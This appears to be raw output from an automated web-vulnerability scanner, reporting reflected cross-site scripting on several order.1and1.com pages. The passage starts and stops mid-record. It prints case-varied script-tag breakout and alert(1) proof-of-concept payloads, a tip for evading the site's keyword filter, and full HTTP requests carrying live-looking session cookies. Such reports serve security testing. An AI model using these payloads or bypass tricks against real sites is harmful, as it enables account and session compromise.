Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingElements is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingElements. The payload 5314a</ScRiPt%20>fdf961380df was submitted in the REST URL parameter 3. This input was returned as 5314a</ScRiPt >fdf961380df in a subsequent request for the URL /xml/order/FeatureSite-buildingElements.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureSite-buildingElements5314a</ScRiPt%20>fdf961380df;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingElements;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingPhotogallery is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingPhotogallery. The payload 99bea</ScRiPt%20>57d930332ed was submitted in the REST URL parameter 3. This input was returned as 99bea</ScRiPt >57d930332ed in a subsequent request for the URL /xml/order/FeatureSite-buildingPhotogallery.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureSite-buildingPhotogallery99bea</ScRiPt%20>57d930332ed;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingWsb is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingWsb. The payload 8a254</ScRiPt%20>517ec0551f8 was submitted in the REST URL parameter 3. This input was returned as 8a254</ScRiPt >517ec0551f8 in a subsequent request for the URL /xml/order/FeatureSite-buildingWsb.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureSite-buildingWsb8a254</ScRiPt%20>517ec0551f8;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Gtc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Gtc. The payload c5e5c</ScRiPt%20>78e706dc8a4 was submitted in the REST URL parameter 3. This input was returned as c5e5c</ScRiPt >78e706dc8a4 in a subsequent request for the URL /xml/order/Gtc.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/Gtcc5e5c</ScRiPt%20>78e706dc8a4;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Home is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Home. The payload 92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d was submitted in the REST URL parameter 3. This input was returned as 92d59</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89b6bbee8d in a subsequent request for the URL /xml/order/Home.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/Home92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=
Request 2
GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=
The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload f884f</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89d857b9fc1 was submitted in the REST URL parameter 3. This input was returned as f884f</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89d857b9fc1 in a subsequent request for the URL /xml/order/Hosting.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload af2f1</ScRiPt%20>54b667825a6 was submitted in the REST URL parameter 3. This input was returned as af2f1</ScRiPt >54b667825a6 in a subsequent request for the URL /xml/order/Hosting.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload 2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308 was submitted in the REST URL parameter 3. This input was returned as 2a1d6</ScRiPt ><x style=x:expression(alert(1))>596a15d5308 in a subsequent request for the URL /xml/order/Hosting.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/Hosting2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
Request 2
GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
The value of REST URL parameter 3 submitted to the URL /xml/order/Instant is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Instant. The payload 92e84</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>9555bc59727 was submitted in the REST URL parameter 3. This input was returned as 92e84</ScRiPt ><ScRiPt>alert(1)</ScRiPt>9555bc59727 in a subsequent request for the URL /xml/order/Instant.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/Instant92e84</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>9555bc59727;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/MailInstantMail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/MailInstantMail. The payload 17be3</ScRiPt%20>4a6827ab2d was submitted in the REST URL parameter 3. This input was returned as 17be3</ScRiPt >4a6827ab2d in a subsequent request for the URL /xml/order/MailInstantMail.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/MailInstantMail17be3</ScRiPt%20>4a6827ab2d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
